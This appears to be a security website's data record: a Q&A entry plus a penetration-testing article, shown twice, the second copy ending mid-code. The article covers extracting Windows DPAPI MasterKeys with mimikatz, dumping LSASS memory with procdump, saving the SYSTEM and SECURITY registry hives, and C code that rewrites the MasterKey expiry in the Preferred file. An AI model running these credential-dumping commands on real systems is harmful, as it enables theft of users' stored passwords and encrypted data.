[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fbCBpWsQdKPVK8arZ2uY2DhTMrHlyQnAL2nww6NohQVk":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},133,"How can an attacker recover the DPAPI MasterKey from a live Windows system using mimikatz?","With administrator privileges, an attacker can run mimikatz in an interactive session and execute the commands `privilege::debug` followed by `sekurlsa::dpapi`. This reads the LSASS process memory and displays all cached MasterKeys along with their corresponding Master Key files. This online technique is effective for immediate decryption of DPAPI blobs on the compromised system.","\u003Cp>With administrator privileges, an attacker can run mimikatz in an interactive session and execute the commands `privilege::debug` followed by `sekurlsa::dpapi`. This reads the LSASS process memory and displays all cached MasterKeys along with their corresponding Master Key files. This online technique is effective for immediate decryption of DPAPI blobs on the compromised system.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-obtaining-the-masterkey-in-dpapi-on-windows-systems\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-recover-the-dpapi-masterkey-from-a-live-windows-system-using-1777485084362","mimikatz, LSASS, online acquisition, sekurlsa::dpapi, privilege escalation",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},36,"Penetration Techniques - Obtaining the MasterKey in DPAPI on Windows Systems","penetration-techniques-obtaining-the-masterkey-in-dpapi-on-windows-systems","Learn how to extract DPAPI MasterKeys on Windows systems using mimikatz, analyze Preferred files, and modify expiration times for security testing.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In Windows systems, most user encrypted data is stored using DPAPI, and to decrypt this data, it is necessary to obtain the corresponding MasterKey for DPAPI. This article will introduce methods to obtain the MasterKey after gaining access to a Windows system, while analyzing the Preferred file format to extend the validity period of the MasterKey.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics\u003C\u002Fp>\u003Cul>\u003Cli>Basic Concepts\u003C\u002Fli>\u003Cli>Methods to Obtain the MasterKey\u003C\u002Fli>\u003Cli>Parsing the Preferred File\u003C\u002Fli>\u003Cli>Modifying the MasterKey Expiration Time\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>DPAPI:\u003C\u002Fh4>\u003Cp>Full name: Data Protection Application Programming Interface\u003C\u002Fp>\u003Cp>Widely used as a data protection interface in the Windows system\u003C\u002Fp>\u003Cp>Primarily used to protect encrypted data, common applications include:\u003C\u002Fp>\u003Cul>\u003Cli>EFS file encryption\u003C\u002Fli>\u003Cli>Storing wireless connection passwords\u003C\u002Fli>\u003Cli>Windows Credential Manager\u003C\u002Fli>\u003Cli>Internet Explorer\u003C\u002Fli>\u003Cli>Outlook\u003C\u002Fli>\u003Cli>Skype\u003C\u002Fli>\u003Cli>Windows CardSpace\u003C\u002Fli>\u003Cli>Windows Vault\u003C\u002Fli>\u003Cli>Google Chrome\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Master Key:\u003C\u002Fh4>\u003Cp>64 bytes, used to decrypt DPAPI blobs; encrypted with the user's login password, SID, and a 16-byte random number, then stored in the Master Key file\u003C\u002Fp>\u003Ch4>Master Key file:\u003C\u002Fh4>\u003Cp>A binary file that can be decrypted using the user's login password to obtain the Master Key\u003C\u002Fp>\u003Cp>There are two types:\u003C\u002Fp>\u003Cul>\u003Cli>User Master Key file, located at %APPDATA%\\Microsoft\\Protect\\%SID%\u003C\u002Fli>\u003Cli>System Master Key file, located at %WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Preferred file:\u003C\u002Fh4>\u003Cp>Located in the same directory as the Master Key file, it shows the currently used MasterKey and its expiration time, with a default validity period of 90 days\u003C\u002Fp>\u003Ch2>0x03 Methods to Obtain MasterKey\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This section mainly introduces the method of obtaining MasterKey through mimikatz\u003C\u002Fp>\u003Ch3>1. Online acquisition\u003C\u002Fh3>\u003Cp>By reading the Lsass process information, obtain the MasterKey in the current system, which can retrieve MasterKeys corresponding to multiple Master Key files\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019792762_0_bd428f94d8.png\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019802693_1_4f73abbd99.png\">\u003C\u002Fp>\u003Ch3>2. Offline Reading\u003C\u002Fh3>\u003Ch4>Approach 1:\u003C\u002Fh4>\u003Cp>Use procdump to dump the LSASS process memory\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use mimikatz to load the dmp file and obtain the MasterKey corresponding to each Master Key file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sekurlsa::minidump lsass.dmp\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Approach 2:\u003C\u002Fh4>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fwiki\u002Fhowto-~-scheduled-tasks-credentials\u003C\u002Fp>\u003Cp>1. Copy the registry file\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg save HKLM\\SYSTEM SystemBkup.hiv\u003Cbr>reg save HKLM\\SECURITY SECURITY.hiv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Obtain DPAPI_SYSTEM from the registry file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz log \"lsadump::secrets \u002Fsystem:SystemBkup.hiv \u002Fsecurity:SECURITY.hiv\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019821101_2_7b8e6a41d4.png\">\u003C\u002Fp>\u003Cp>The user hash in DPAPI_SYSTEM is c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3, which can be used to decrypt the system Master Key file located at %WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\u003C\u002Fp>\u003Cp>3. Decrypt the system Master Key file to obtain the MasterKey\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz \"dpapi::masterkey \u002Fin:C:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\04ece708-132d-4bf0-a647-e3329269a012 \u002Fsystem:c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The decrypted MasterKey is 3e9d7f32f2e57933ead318d075efc82325697d87d992b626a20abb5f0ffba6f073d282a837b6fa058ecff36039aa944e04b3dfb666ebace44aad6bff8789ca43\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019836533_3_af45954e5b.png\">\u003C\u002Fp>\u003Ch2>0x04 Parse the Preferred file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Located in the same directory as the Master Key file, it displays the MasterKey file currently in use by the system and its expiration time\u003C\u002Fp>\u003Cp>Format is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>typedef struct _tagPreferredMasterKey\u003Cbr>{\u003Cbr>\tGUID guidMasterKey;\u003Cbr>\tFILETIME ftCreated;\u003Cbr>} PREFERREDMASTERKEY, *PPREFERREDMASTERKEY;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For example C:\\Users\\b\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2884853959-2080156797-250722187-1002\\Preferred\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019861855_4_c0e30f938e.png\">\u003C\u002Fp>\u003Cp>The first 16 bytes F6 B0 11 A1 D7 B4 C8 40 B5 36 67 2A 82 88 B9 58 correspond to the GUID. After adjusting the format, the corresponding file is a111b0f6-b4d7-40c8-b536-672a8288b958\u003C\u002Fp>\u003Cp>The last 8 bytes D0 08 9F 7D 11 EC D3 01 correspond to the expiration time\u003C\u002Fp>\u003Cp>For FILETIME representing time, the format is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>typedef struct _FILETIME {\u003Cbr>                          DWORD dwLowDateTime;\u003Cbr>                          DWORD dwHighDateTime;\u003Cbr>} FILETIME, *PFILETIME;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To display in a daily-use time format, FILETIME type needs to be converted to SYSTEMTIME type\u003C\u002Fp>\u003Cp>In program implementation, it's also necessary to use the sscanf_s function to convert strings to DWORD format\u003C\u002Fp>\u003Cp>Reference C code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>int main(void)\u003Cbr>{\u003Cbr>\tFILE *fp;\u003Cbr>\tunsigned char buf[24];\u003Cbr>    fopen_s(&amp;fp,\"Preferred\",\"rb\");\u003Cbr>    fread(buf,1,24,fp);\u003Cbr>\tprintf(\"Data: \");\u003Cbr>\tfor(int i=0;i&lt;24;i++)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"%02x\",buf[i]);\u003Cbr>\t}\u003Cbr>\tfclose(fp);\u003Cbr>\u003Cbr>\tprintf(\"\\nguidMasterKey: %02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x\\n\",buf[3],buf[2],buf[1],buf[0],buf[5],buf[4],buf[7],buf[6],buf[8],buf[9],buf[10],buf[11],buf[12],buf[13],buf[14],buf[15]);\u003Cbr>\u003Cbr>\tchar lowDateTime[9],highDateTime[9];\u003Cbr>\tsprintf_s(lowDateTime,9,\"%02X%02X%02X%02X\",buf[19],buf[18],buf[17],buf[16]);\u003Cbr>\tsprintf_s(highDateTime,9,\"%02X%02X%02X%02X\",buf[23],buf[22],buf[21],buf[20]);\u003Cbr>\u003Cbr>\tprintf(\"dwLowDateTime:%s\\n\",lowDateTime);\u003Cbr>\tprintf(\"dwHighDateTime:%s\\n\",highDateTime);\u003Cbr>\u003Cbr>\tFILETIME        ftUTC;\u003Cbr>\tSYSTEMTIME      stUTC2;\u003Cbr>\tsscanf_s(lowDateTime,\"%x\",&amp;ftUTC.dwLowDateTime);\u003Cbr>\tsscanf_s(highDateTime,\"%x\",&amp;ftUTC.dwHighDateTime);\u003Cbr>\tFileTimeToSystemTime(&amp;ftUTC, &amp;stUTC2);\u003Cbr>\tprintf(\"\");\u003Cbr>\tprintf(\"Expiry time: %d-%d-%d %d:%d:%d\\n\", stUTC2.wYear, stUTC2.wMonth, stUTC2.wDay, stUTC2.wHour, stUTC2.wMinute, stUTC2.wSecond);\u003Cbr>\u003Cbr>\treturn 0;\u003Cbr>} \u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>You can also use fread to read int type data to solve the string reverse order problem\u003C\u002Fp>\u003Cp>Read the Preferred file, parse the guid and expiration time of the Master Key file currently in use by the system\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019867128_5_669acb5e58.png\">\u003C\u002Fp>\u003Ch2>0x05 Modify MasterKey expiration time\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Modification approach:\u003C\u002Fp>\u003Cp>Enter the expiration time, convert it to FILETIME format, and replace the FILETIME in the Preferred file\u003C\u002Fp>\u003Cp>Reference C code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>  \u003Cbr>int main(void)  \u003Cbr>{  \u003Cbr>\tSYSTEMTIME st={0};\u003Cbr>\tFILETIME   ft={0};\u003Cbr>\tprintf(\"[+]Start to change expiry time...\\n\");\t\u003Cbr>\tst.wYear = 2019;\u003Cbr>\tst.wMonth = 12;\u003Cbr>\tst.wDay = 30;\u003Cbr>\tst.wHour = 12;\u003Cbr>\tst.wMinute = 30;\u003Cbr>\tst.wSecond = 30;\u003Cbr>\tprintf(\"[+]New expiry time:%d-%d-%d %d:%d:%d\\n\", st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);\u003Cbr>\tSystemTimeToFileTime(&amp;st,&amp;ft);\u003Cbr>\tprintf(\"dwLowDateTime:%08x\\n\",ft.dwLowDateTime);\u003Cbr>\tprintf(\"dwHighDateTime:%08x\\n\",ft.dwHighDateTime);\u003Cbr>\u003Cbr>\tFILE *fp;\u003Cbr>    fopen_s(&amp;fp,\"Preferred\",\"rb+\");\u003Cbr>\tfseek(fp,16,SEEK_SET);\u003Cbr>    fwrite(&amp;ft.dwLowDateTime,sizeof(int),1,fp);\u003Cbr>\tfwrite(&amp;ft.dwHighDateTime,sizeof(int),1,fp);\u003Cbr>\tfclose(fp);\u003Cbr>\tprintf(\"[+]Change success.\\n\");\u003Cbr>\treturn 0;  \u003Cbr>} \u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Read the Preferred file and set the expiration time to 2019-12-30 12:30:30\u003C\u002Fp>\u003Cp>After modification, re-read the Preferred file information, successfully modified, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770019870935_6_c21fb211e8.png\">\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article summarizes the method of obtaining the MasterKey after gaining Windows system privileges, writing a program to automatically analyze the Preferred file format and extend the validity period of the MasterKey\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In Windows systems, most user encrypted data is stored using DPAPI, and to decrypt this data, it is necessary to obtain the corresponding MasterKey for DPAPI. This article will introduce methods to obtain the MasterKey after gaining access to a Windows system, while analyzing the Preferred file format to extend the validity period of the MasterKey.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics\u003C\u002Fp>\u003Cul>\u003Cli>Basic Concepts\u003C\u002Fli>\u003Cli>Methods to Obtain the MasterKey\u003C\u002Fli>\u003Cli>Parsing the Preferred File\u003C\u002Fli>\u003Cli>Modifying the MasterKey Expiration Time\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Basic Concepts\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch4>DPAPI:\u003C\u002Fh4>\u003Cp>Full name: Data Protection Application Programming Interface\u003C\u002Fp>\u003Cp>Widely used as a data protection interface in the Windows system\u003C\u002Fp>\u003Cp>Primarily used to protect encrypted data, common applications include:\u003C\u002Fp>\u003Cul>\u003Cli>EFS file encryption\u003C\u002Fli>\u003Cli>Storing wireless connection passwords\u003C\u002Fli>\u003Cli>Windows Credential Manager\u003C\u002Fli>\u003Cli>Internet Explorer\u003C\u002Fli>\u003Cli>Outlook\u003C\u002Fli>\u003Cli>Skype\u003C\u002Fli>\u003Cli>Windows CardSpace\u003C\u002Fli>\u003Cli>Windows Vault\u003C\u002Fli>\u003Cli>Google Chrome\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Master Key:\u003C\u002Fh4>\u003Cp>64 bytes, used to decrypt DPAPI blobs; encrypted with the user's login password, SID, and a 16-byte random number, then stored in the Master Key file\u003C\u002Fp>\u003Ch4>Master Key file:\u003C\u002Fh4>\u003Cp>A binary file that can be decrypted using the user's login password to obtain the Master Key\u003C\u002Fp>\u003Cp>There are two types:\u003C\u002Fp>\u003Cul>\u003Cli>User Master Key file, located at %APPDATA%\\Microsoft\\Protect\\%SID%\u003C\u002Fli>\u003Cli>System Master Key file, located at %WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\u003C\u002Fli>\u003C\u002Ful>\u003Ch4>Preferred file:\u003C\u002Fh4>\u003Cp>Located in the same directory as the Master Key file, it shows the currently used MasterKey and its expiration time, with a default validity period of 90 days\u003C\u002Fp>\u003Ch2>0x03 Methods to Obtain MasterKey\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This section mainly introduces the method of obtaining MasterKey through mimikatz\u003C\u002Fp>\u003Ch3>1. Online acquisition\u003C\u002Fh3>\u003Cp>By reading the Lsass process information, obtain the MasterKey in the current system, which can retrieve MasterKeys corresponding to multiple Master Key files\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019792762_0_bd428f94d8-1.png\">\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019802693_1_4f73abbd99-1.png\">\u003C\u002Fp>\u003Ch3>2. Offline Reading\u003C\u002Fh3>\u003Ch4>Approach 1:\u003C\u002Fh4>\u003Cp>Use procdump to dump the LSASS process memory\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>procdump.exe -accepteula -ma lsass.exe lsass.dmp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Use mimikatz to load the dmp file and obtain the MasterKey corresponding to each Master Key file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>sekurlsa::minidump lsass.dmp\u003Cbr>sekurlsa::dpapi\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>Approach 2:\u003C\u002Fh4>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fwiki\u002Fhowto-~-scheduled-tasks-credentials\u003C\u002Fp>\u003Cp>1. Copy the registry file\u003C\u002Fp>\u003Cp>Administrator privileges:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>reg save HKLM\\SYSTEM SystemBkup.hiv\u003Cbr>reg save HKLM\\SECURITY SECURITY.hiv\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>2. Obtain DPAPI_SYSTEM from the registry file\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz log \"lsadump::secrets \u002Fsystem:SystemBkup.hiv \u002Fsecurity:SECURITY.hiv\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019821101_2_7b8e6a41d4-1.png\">\u003C\u002Fp>\u003Cp>The user hash in DPAPI_SYSTEM is c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3, which can be used to decrypt the system Master Key file located at %WINDIR%\\System32\\Microsoft\\Protect\\S-1-5-18\\User\u003C\u002Fp>\u003Cp>3. Decrypt the system Master Key file to obtain the MasterKey\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz \"dpapi::masterkey \u002Fin:C:\\Windows\\System32\\Microsoft\\Protect\\S-1-5-18\\User\\04ece708-132d-4bf0-a647-e3329269a012 \u002Fsystem:c2872cf6d6d4db31c6c8d33beb49b482e78e7ce3\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The decrypted MasterKey is 3e9d7f32f2e57933ead318d075efc82325697d87d992b626a20abb5f0ffba6f073d282a837b6fa058ecff36039aa944e04b3dfb666ebace44aad6bff8789ca43\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019836533_3_af45954e5b-1.png\">\u003C\u002Fp>\u003Ch2>0x04 Parse the Preferred file\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Located in the same directory as the Master Key file, it displays the MasterKey file currently in use by the system and its expiration time\u003C\u002Fp>\u003Cp>Format is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>typedef struct _tagPreferredMasterKey\u003Cbr>{\u003Cbr>\tGUID guidMasterKey;\u003Cbr>\tFILETIME ftCreated;\u003Cbr>} PREFERREDMASTERKEY, *PPREFERREDMASTERKEY;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>For example C:\\Users\\b\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2884853959-2080156797-250722187-1002\\Preferred\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019861855_4_c0e30f938e-1.png\">\u003C\u002Fp>\u003Cp>The first 16 bytes F6 B0 11 A1 D7 B4 C8 40 B5 36 67 2A 82 88 B9 58 correspond to the GUID. After adjusting the format, the corresponding file is a111b0f6-b4d7-40c8-b536-672a8288b958\u003C\u002Fp>\u003Cp>The last 8 bytes D0 08 9F 7D 11 EC D3 01 correspond to the expiration time\u003C\u002Fp>\u003Cp>For FILETIME representing time, the format is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>typedef struct _FILETIME {\u003Cbr>                          DWORD dwLowDateTime;\u003Cbr>                          DWORD dwHighDateTime;\u003Cbr>} FILETIME, *PFILETIME;\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To display in a daily-use time format, FILETIME type needs to be converted to SYSTEMTIME type\u003C\u002Fp>\u003Cp>In program implementation, it's also necessary to use the sscanf_s function to convert strings to DWORD format\u003C\u002Fp>\u003Cp>Reference C code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>\u003Cbr>\u003Cbr>int main(void)\u003Cbr>{\u003Cbr>\tFILE *fp;\u003Cbr>\tunsigned char buf[24];\u003Cbr>    fopen_s(&amp;fp,\"Preferred\",\"rb\");\u003Cbr>    fread(buf,1,24,fp);\u003Cbr>\tprintf(\"Data: \");\u003Cbr>\tfor(int i=0;i&lt;24;i++)\u003Cbr>\t{\u003Cbr>\t\tprintf(\"%02x\",buf[i]);\u003Cbr>\t}\u003Cbr>\tfclose(fp);\u003Cbr>\u003Cbr>\tprintf(\"\\nguidMasterKey: %02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x\\n\",buf[3],buf[2],buf[1],buf[0],buf[5],buf[4],buf[7],buf[6],buf[8],buf[9],buf[10],buf[11],buf[12],buf[13],buf[14],buf[15]);\u003Cbr>\u003Cbr>\tchar lowDateTime[9],highDateTime[9];\u003Cbr>\tsprintf_s(lowDateTime,9,\"%02X%02X%02X%02X\",buf[19],buf[18],buf[17],buf[16]);\u003Cbr>\tsprintf_s(highDateTime,9,\"%02X%02X%02X%02X\",buf[23],buf[22],buf[21],buf[20]);\u003Cbr>\u003Cbr>\tprintf(\"dwLowDateTime:%s\\n\",lowDateTime);\u003Cbr>\tprintf(\"dwHighDateTime:%s\\n\",highDateTime);\u003Cbr>\u003Cbr>\tFILETIME        ftUTC;\u003Cbr>\tSYSTEMTIME      stUTC2;\u003Cbr>\tsscanf_s(lowDateTime,\"%x\",&amp;ftUTC.dwLowDateTime);\u003Cbr>\tsscanf_s(highDateTime,\"%x\",&amp;ftUTC.dwHighDateTime);\u003Cbr>\tFileTimeToSystemTime(&amp;ftUTC, &amp;stUTC2);\u003Cbr>\tprintf(\"\");\u003Cbr>\tprintf(\"Expiry time: %d-%d-%d %d:%d:%d\\n\", stUTC2.wYear, stUTC2.wMonth, stUTC2.wDay, stUTC2.wHour, stUTC2.wMinute, stUTC2.wSecond);\u003Cbr>\u003Cbr>\treturn 0;\u003Cbr>} \u003C\u002Fwindows.h>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>You can also use fread to read int type data to solve the string reverse order problem\u003C\u002Fp>\u003Cp>Read the Preferred file, parse the guid and expiration time of the Master Key file currently in use by the system\u003C\u002Fp>\u003Cp>Test as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770019867128_5_669acb5e58-1.png\">\u003C\u002Fp>\u003Ch2>0x05 Modify MasterKey expiration time\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Modification approach:\u003C\u002Fp>\u003Cp>Enter the expiration time, convert it to FILETIME format, and replace the FILETIME in the Preferred file\u003C\u002Fp>\u003Cp>Reference C code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>#include \u003Cwindows.h>  \u003Cbr>int main(void)  \u003Cbr>{  \u003Cbr>\tSYSTEMTIME st={0};\u003Cbr>\tFILETIME   ft={0};\u003Cbr>\tprintf(\"[+]Start to change expiry time...\\n\");\t\u003Cbr>\tst.wYear = 2019;\u003Cbr>\tst.wMonth = 12;\u003Cbr>\tst.wDay = 30;\u003Cbr>\tst.wHour = 12;\u003Cbr>\tst.wMinute = 30;\u003Cbr>\tst.wSecond = 30;\u003Cbr>\tprintf(\"[+]New expiry time:%d-%d-%d %d:%d:%d\\n\", st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);\u003Cbr>\tSystemTimeToFileTime(&amp;st,&amp;ft);\u003Cbr>\tprintf(\"dwLowDateTime:%08x\\n\",ft.dwLowDateTime);\u003Cbr>\tprintf(\"dwHighDateTime:%08x\\n\",ft.dwHighDateTime);\u003Cbr>\u003Cbr>\tFILE *fp;\u003Cbr>    fopen_s(&amp;fp,\"Preferred\",\"rb+\");\u003Cbr>\tfseek(fp,16,SEEK_SET);\u003Cbr>    